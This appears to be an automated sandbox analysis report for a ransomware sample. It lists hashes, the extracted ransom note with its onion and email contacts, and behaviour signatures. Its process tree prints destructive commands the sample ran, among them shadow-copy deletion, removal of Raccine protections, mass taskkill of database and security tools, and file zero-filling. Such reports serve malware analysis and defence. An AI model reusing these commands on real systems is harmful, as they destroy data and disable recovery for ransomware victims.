Analysis

  • max time kernel
    149s
  • max time network
    152s
  • platform
    windows7_x64
  • resource
    win7-20220414-en
  • submitted
    21-06-2022 17:41

General

  • Target

    sample.exe

  • Size

    94KB

  • MD5

    26f65722f6307386f3aa23237f44c24a

  • SHA1

    d26becc64f43c7af17f2d39d3fc1b744ac3e8fbb

  • SHA256

    cce5a753888cb5b044c767fe8e95e410ebdf1e1c79cabc95db1c9e1a8e81c5e7

  • SHA512

    241c6ba3e95206827fe26ee6ef279e0bad2fbe6d4b55732fdacd078e2a977726a01bc16fd4b213b7483a1f1e74d1355dc416fb04ad8d86e3da2443cfa499bbb1

Score
10/10

Malware Config

Extracted

Path

C:\Users\Admin\AppData\Local\Temp\RECOVERY.txt

Ransom Note
All your important files are encrypted! Any attempts to recover your files using third-party software will have fatal consequences, the files will be changed forever, without the possibility of recovery. There is only one way to get your files back: install the tor browser (https://www.torproject.org/download ) Important: Create a new email in the service http://pflujznptk5lmuf6xwadfqy6nffykdvahfbljh7liljailjbxrgvhfid.onion/account/create for contact! write to me at Retailgaze@onionmail.org Send me your ID by email Key Identifier:
Emails

Retailgaze@onionmail.org

URLs

http://pflujznptk5lmuf6xwadfqy6nffykdvahfbljh7liljailjbxrgvhfid.onion/account/create

Signatures

  • Modifies extensions of user files 8 IoCs

    Ransomware generally changes the extension on encrypted files.

  • Deletes itself 1 IoCs
  • Drops startup file 1 IoCs
  • Drops desktop.ini file(s) 6 IoCs
  • Drops file in Program Files directory 63 IoCs
  • Drops file in Windows directory 28 IoCs
  • Launches sc.exe 8 IoCs

    Sc.exe is a Windows utility to control services on the system.

  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

  • Kills process with taskkill 48 IoCs
  • Modifies registry class 12 IoCs
  • Modifies registry key 1 TTPs 1 IoCs
  • Opens file in notepad (likely ransom note) 2 IoCs
  • Runs ping.exe 1 TTPs 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 64 IoCs
  • Suspicious behavior: GetForegroundWindowSpam 1 IoCs
  • Suspicious use of AdjustPrivilegeToken 49 IoCs
  • Suspicious use of FindShellTrayWindow 1 IoCs
  • Suspicious use of SendNotifyMessage 1 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\sample.exe
    "C:\Users\Admin\AppData\Local\Temp\sample.exe"
    1⤵
    • Modifies extensions of user files
    • Drops startup file
    • Drops desktop.ini file(s)
    • Drops file in Program Files directory
    • Drops file in Windows directory
    • Suspicious behavior: EnumeratesProcesses
    • Suspicious use of AdjustPrivilegeToken
    • Suspicious use of FindShellTrayWindow
    • Suspicious use of SendNotifyMessage
    • Suspicious use of WriteProcessMemory
    PID:1664
    • C:\Windows\SysWOW64\taskkill.exe
      "taskkill" /F /IM RaccineSettings.exe
      2⤵
      • Kills process with taskkill
      • Suspicious use of AdjustPrivilegeToken
      PID:2036
    • C:\Windows\SysWOW64\reg.exe
      "reg" delete "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /V "Raccine Tray" /F
      2⤵
        PID:652
      • C:\Windows\SysWOW64\reg.exe
        "reg" delete HKCU\Software\Raccine /F
        2⤵
        • Modifies registry key
        PID:1404
      • C:\Windows\SysWOW64\schtasks.exe
        "schtasks" /DELETE /TN "Raccine Rules Updater" /F
        2⤵
          PID:992
        • C:\Windows\SysWOW64\sc.exe
          "sc.exe" config Dnscache start= auto
          2⤵
          • Launches sc.exe
          PID:1656
        • C:\Windows\SysWOW64\sc.exe
          "sc.exe" config SQLTELEMETRY start= disabled
          2⤵
          • Launches sc.exe
          PID:1724
        • C:\Windows\SysWOW64\sc.exe
          "sc.exe" config FDResPub start= auto
          2⤵
          • Launches sc.exe
          PID:1968
        • C:\Windows\SysWOW64\cmd.exe
          "cmd.exe" /c rd /s /q %SYSTEMDRIVE%\\$Recycle.bin
          2⤵
            PID:1864
          • C:\Windows\SysWOW64\sc.exe
            "sc.exe" config SSDPSRV start= auto
            2⤵
            • Launches sc.exe
            PID:1500
          • C:\Windows\SysWOW64\sc.exe
            "sc.exe" config SQLTELEMETRY$ECWDB2 start= disabled
            2⤵
            • Launches sc.exe
            PID:1196
          • C:\Windows\SysWOW64\sc.exe
            "sc.exe" config SQLWriter start= disabled
            2⤵
            • Launches sc.exe
            PID:1880
          • C:\Windows\SysWOW64\sc.exe
            "sc.exe" config upnphost start= auto
            2⤵
            • Launches sc.exe
            PID:616
          • C:\Windows\SysWOW64\sc.exe
            "sc.exe" config SstpSvc start= disabled
            2⤵
            • Launches sc.exe
            PID:1448
          • C:\Windows\SysWOW64\taskkill.exe
            "taskkill.exe" /IM mspub.exe /F
            2⤵
            • Kills process with taskkill
            • Suspicious use of AdjustPrivilegeToken
            PID:848
          • C:\Windows\SysWOW64\taskkill.exe
            "taskkill.exe" /IM mspub.exe /F
            2⤵
            • Kills process with taskkill
            • Suspicious use of AdjustPrivilegeToken
            PID:1808
          • C:\Windows\SysWOW64\taskkill.exe
            "taskkill.exe" /IM synctime.exe /F
            2⤵
            • Kills process with taskkill
            • Suspicious use of AdjustPrivilegeToken
            PID:928
          • C:\Windows\SysWOW64\taskkill.exe
            "taskkill.exe" /IM mydesktopqos.exe /F
            2⤵
            • Kills process with taskkill
            • Suspicious use of AdjustPrivilegeToken
            PID:1868
          • C:\Windows\SysWOW64\taskkill.exe
            "taskkill.exe" /IM mysqld.exe /F
            2⤵
            • Kills process with taskkill
            • Suspicious use of AdjustPrivilegeToken
            PID:1352
          • C:\Windows\SysWOW64\taskkill.exe
            "taskkill.exe" /IM Ntrtscan.exe /F
            2⤵
            • Kills process with taskkill
            • Suspicious use of AdjustPrivilegeToken
            PID:1984
          • C:\Windows\SysWOW64\taskkill.exe
            "taskkill.exe" /IM sqbcoreservice.exe /F
            2⤵
            • Kills process with taskkill
            PID:268
          • C:\Windows\SysWOW64\taskkill.exe
            "taskkill.exe" /IM mydesktopservice.exe /F
            2⤵
            • Kills process with taskkill
            • Suspicious use of AdjustPrivilegeToken
            PID:816
          • C:\Windows\SysWOW64\taskkill.exe
            "taskkill.exe" /IM agntsvc.exe /F
            2⤵
            • Kills process with taskkill
            • Suspicious use of AdjustPrivilegeToken
            PID:1924
          • C:\Windows\SysWOW64\taskkill.exe
            "taskkill.exe" /IM isqlplussvc.exe /F
            2⤵
            • Kills process with taskkill
            • Suspicious use of AdjustPrivilegeToken
            PID:608
          • C:\Windows\SysWOW64\taskkill.exe
            "taskkill.exe" /IM firefoxconfig.exe /F
            2⤵
            • Kills process with taskkill
            • Suspicious use of AdjustPrivilegeToken
            PID:700
          • C:\Windows\SysWOW64\taskkill.exe
            "taskkill.exe" /IM steam.exe /F
            2⤵
            • Kills process with taskkill
            • Suspicious use of AdjustPrivilegeToken
            PID:1720
          • C:\Windows\SysWOW64\taskkill.exe
            "taskkill.exe" /IM thebat.exe /F
            2⤵
            • Kills process with taskkill
            • Suspicious use of AdjustPrivilegeToken
            PID:872
          • C:\Windows\SysWOW64\taskkill.exe
            "taskkill.exe" /IM sqlwriter.exe /F
            2⤵
            • Kills process with taskkill
            • Suspicious use of AdjustPrivilegeToken
            PID:1640
          • C:\Windows\SysWOW64\taskkill.exe
            "taskkill.exe" /IM onenote.exe /F
            2⤵
            • Kills process with taskkill
            PID:316
          • C:\Windows\SysWOW64\taskkill.exe
            "taskkill.exe" /IM ocomm.exe /F
            2⤵
            • Kills process with taskkill
            PID:1864
          • C:\Windows\SysWOW64\taskkill.exe
            "taskkill.exe" /IM encsvc.exe /F
            2⤵
            • Kills process with taskkill
            • Suspicious use of AdjustPrivilegeToken
            PID:1872
          • C:\Windows\SysWOW64\taskkill.exe
            "taskkill.exe" /IM PccNTMon.exe /F
            2⤵
            • Kills process with taskkill
            • Suspicious use of AdjustPrivilegeToken
            PID:780
          • C:\Windows\SysWOW64\taskkill.exe
            "taskkill.exe" /IM tbirdconfig.exe /F
            2⤵
            • Kills process with taskkill
            PID:1996
          • C:\Windows\SysWOW64\taskkill.exe
            "taskkill.exe" /IM infopath.exe /F
            2⤵
            • Kills process with taskkill
            • Suspicious use of AdjustPrivilegeToken
            PID:296
          • C:\Windows\SysWOW64\taskkill.exe
            "taskkill.exe" /IM excel.exe /F
            2⤵
            • Kills process with taskkill
            • Suspicious use of AdjustPrivilegeToken
            PID:2028
          • C:\Windows\SysWOW64\taskkill.exe
            "taskkill.exe" /IM dbeng50.exe /F
            2⤵
            • Kills process with taskkill
            • Suspicious use of AdjustPrivilegeToken
            PID:556
          • C:\Windows\SysWOW64\taskkill.exe
            "taskkill.exe" /IM msaccess.exe /F
            2⤵
            • Kills process with taskkill
            PID:916
          • C:\Windows\SysWOW64\taskkill.exe
            "taskkill.exe" /IM mbamtray.exe /F
            2⤵
            • Kills process with taskkill
            • Suspicious use of AdjustPrivilegeToken
            PID:1392
          • C:\Windows\SysWOW64\taskkill.exe
            "taskkill.exe" /IM outlook.exe /F
            2⤵
            • Kills process with taskkill
            • Suspicious use of AdjustPrivilegeToken
            PID:1928
          • C:\Windows\SysWOW64\taskkill.exe
            "taskkill.exe" /IM thebat64.exe /F
            2⤵
            • Kills process with taskkill
            • Suspicious use of AdjustPrivilegeToken
            PID:1352
          • C:\Windows\SysWOW64\taskkill.exe
            "taskkill.exe" /IM CNTAoSMgr.exe /F
            2⤵
            • Kills process with taskkill
            • Suspicious use of AdjustPrivilegeToken
            PID:1968
          • C:\Windows\SysWOW64\taskkill.exe
            "taskkill.exe" IM thunderbird.exe /F
            2⤵
            • Kills process with taskkill
            • Suspicious use of AdjustPrivilegeToken
            PID:268
          • C:\Windows\SysWOW64\taskkill.exe
            "taskkill.exe" /IM tmlisten.exe /F
            2⤵
            • Kills process with taskkill
            • Suspicious use of AdjustPrivilegeToken
            PID:1984
          • C:\Windows\SysWOW64\taskkill.exe
            "taskkill.exe" /IM zoolz.exe /F
            2⤵
            • Kills process with taskkill
            • Suspicious use of AdjustPrivilegeToken
            PID:792
          • C:\Windows\SysWOW64\taskkill.exe
            "taskkill.exe" /IM wordpad.exe /F
            2⤵
            • Kills process with taskkill
            • Suspicious use of AdjustPrivilegeToken
            PID:1676
          • C:\Windows\SysWOW64\taskkill.exe
            "taskkill.exe" /IM dbsnmp.exe /F
            2⤵
            • Kills process with taskkill
            • Suspicious use of AdjustPrivilegeToken
            PID:1016
          • C:\Windows\SysWOW64\taskkill.exe
            "taskkill.exe" /IM msftesql.exe /F
            2⤵
            • Kills process with taskkill
            • Suspicious use of AdjustPrivilegeToken
            PID:948
          • C:\Windows\SysWOW64\taskkill.exe
            "taskkill.exe" /IM mysqld-opt.exe /F
            2⤵
            • Kills process with taskkill
            • Suspicious use of AdjustPrivilegeToken
            PID:1680
          • C:\Windows\SysWOW64\taskkill.exe
            "taskkill.exe" /IM xfssvccon.exe /F
            2⤵
            • Kills process with taskkill
            • Suspicious use of AdjustPrivilegeToken
            PID:1416
          • C:\Windows\SysWOW64\taskkill.exe
            "taskkill.exe" /IM powerpnt.exe /F
            2⤵
            • Kills process with taskkill
            • Suspicious use of AdjustPrivilegeToken
            PID:1764
          • C:\Windows\SysWOW64\taskkill.exe
            "taskkill.exe" /IM ocautoupds.exe /F
            2⤵
            • Kills process with taskkill
            • Suspicious use of AdjustPrivilegeToken
            PID:1424
          • C:\Windows\SysWOW64\taskkill.exe
            "taskkill.exe" /IM mydesktopqos.exe /F
            2⤵
            • Kills process with taskkill
            • Suspicious use of AdjustPrivilegeToken
            PID:968
          • C:\Windows\SysWOW64\taskkill.exe
            "taskkill.exe" /IM ocssd.exe /F
            2⤵
            • Kills process with taskkill
            • Suspicious use of AdjustPrivilegeToken
            PID:1864
          • C:\Windows\SysWOW64\taskkill.exe
            "taskkill.exe" /IM visio.exe /F
            2⤵
            • Kills process with taskkill
            • Suspicious use of AdjustPrivilegeToken
            PID:316
          • C:\Windows\SysWOW64\taskkill.exe
            "taskkill.exe" /IM oracle.exe /F
            2⤵
            • Kills process with taskkill
            • Suspicious use of AdjustPrivilegeToken
            PID:804
          • C:\Windows\SysWOW64\taskkill.exe
            "taskkill.exe" /IM mydesktopservice.exe /F
            2⤵
            • Kills process with taskkill
            • Suspicious use of AdjustPrivilegeToken
            PID:2000
          • C:\Windows\SysWOW64\taskkill.exe
            "taskkill.exe" /IM winword.exe /F
            2⤵
            • Kills process with taskkill
            • Suspicious use of AdjustPrivilegeToken
            PID:564
          • C:\Windows\SysWOW64\taskkill.exe
            "taskkill.exe" /IM sqlagent.exe /F
            2⤵
            • Kills process with taskkill
            • Suspicious use of AdjustPrivilegeToken
            PID:1484
          • C:\Windows\SysWOW64\taskkill.exe
            "taskkill.exe" /IM mysqld-nt.exe /F
            2⤵
            • Kills process with taskkill
            • Suspicious use of AdjustPrivilegeToken
            PID:1196
          • C:\Windows\SysWOW64\taskkill.exe
            "taskkill.exe" /IM sqlbrowser.exe /F
            2⤵
            • Kills process with taskkill
            • Suspicious use of AdjustPrivilegeToken
            PID:616
          • C:\Windows\SysWOW64\taskkill.exe
            "taskkill.exe" /IM sqlservr.exe /F
            2⤵
            • Kills process with taskkill
            • Suspicious use of AdjustPrivilegeToken
            PID:916
          • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
            "powershell.exe" & Get-WmiObject Win32_Shadowcopy | ForEach-Object { $_Delete(); }
            2⤵
            • Suspicious use of AdjustPrivilegeToken
            PID:1976
          • C:\Windows\SysWOW64\notepad.exe
            "C:\Windows\System32\notepad.exe" C:\Users\Admin\Desktop\RECOVERY.txt
            2⤵
            • Opens file in notepad (likely ransom note)
            PID:1516
          • C:\Windows\SysWOW64\cmd.exe
            "cmd.exe" /C ping 127.0.0.7 -n 3 > Nul & fsutil file setZeroData offset=0 length=524288 “%s” & Del /f /q “%s”
            2⤵
              PID:1592
              • C:\Windows\SysWOW64\PING.EXE
                ping 127.0.0.7 -n 3
                3⤵
                • Runs ping.exe
                PID:780
              • C:\Windows\SysWOW64\fsutil.exe
                fsutil file setZeroData offset=0 length=524288 “%s”
                3⤵
                  PID:1880
              • C:\Windows\SysWOW64\cmd.exe
                "C:\Windows\System32\cmd.exe" "/C choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\AppData\Local\Temp\sample.exe
                2⤵
                • Deletes itself
                PID:1764
                • C:\Windows\SysWOW64\choice.exe
                  choice /C Y /N /D Y /T 3
                  3⤵
                    PID:1484
              • C:\Windows\system32\conhost.exe
                \??\C:\Windows\system32\conhost.exe "-3439596191425314019-4125160258150192761319059127-809508426-1685777795286717014"
                1⤵
                  PID:268
                • C:\Windows\system32\conhost.exe
                  \??\C:\Windows\system32\conhost.exe "-9295736892041876431229420506148101041-1410211457-1314614114727357354515720437"
                  1⤵
                  • Suspicious use of AdjustPrivilegeToken
                  PID:1996
                • C:\Windows\system32\rundll32.exe
                  "C:\Windows\system32\rundll32.exe" C:\Windows\system32\shell32.dll,OpenAs_RunDLL C:\Users\Admin\Desktop\RestoreConnect.xla.trins
                  1⤵
                  • Modifies registry class
                  • Suspicious behavior: GetForegroundWindowSpam
                  PID:608
                  • C:\Windows\system32\NOTEPAD.EXE
                    "C:\Windows\system32\NOTEPAD.EXE" C:\Users\Admin\Desktop\RestoreConnect.xla.trins
                    2⤵
                    • Opens file in notepad (likely ransom note)
                    PID:1276

                Network

                MITRE ATT&CK Matrix ATT&CK v6

                Defense Evasion

                Modify Registry

                1
                T1112

                Discovery

                System Information Discovery

                1
                T1082

                Remote System Discovery

                1
                T1018

                Downloads

                • C:\Users\Admin\Desktop\RECOVERY.txt
                  Filesize

                  1KB

                  MD5

                  457ae8f12b448de3a2c4bb18146ae744

                  SHA1

                  0ba6ffc29c94e4f04f795b2df28bba23ba350cc9

                  SHA256

                  cc1ae0b34340478701b48203c553dac85d83ca4ad8639dba01e64d3d4f1788af

                  SHA512

                  75e3d215aced22fd0249c257f35da84fd4dc2fcce3c69815f55f770486fe1cb6c673e4b08c817e9e78bec2fa0d57ee9cbe8077a01d9e2df660b1899f3134a7a9

                • C:\Users\Admin\Desktop\RestoreConnect.xla.trins
                  Filesize

                  410KB

                  MD5

                  7508f2fd88f4196aeeeee65b19805435

                  SHA1

                  213f660409f7ee21dd55ce00414c53bebea633dc

                  SHA256

                  ed40c66f94519096100665682ec7be14108aa1a241c658df5f6736204c79c6f6

                  SHA512

                  a00d5b4390a4f67ed12abace9b7f79bf7e242684ac8c644ec2bf71641100c549811919d504dca416b539127dc9a849d5beeb2a375b52efab0dcb71c621f00c7d
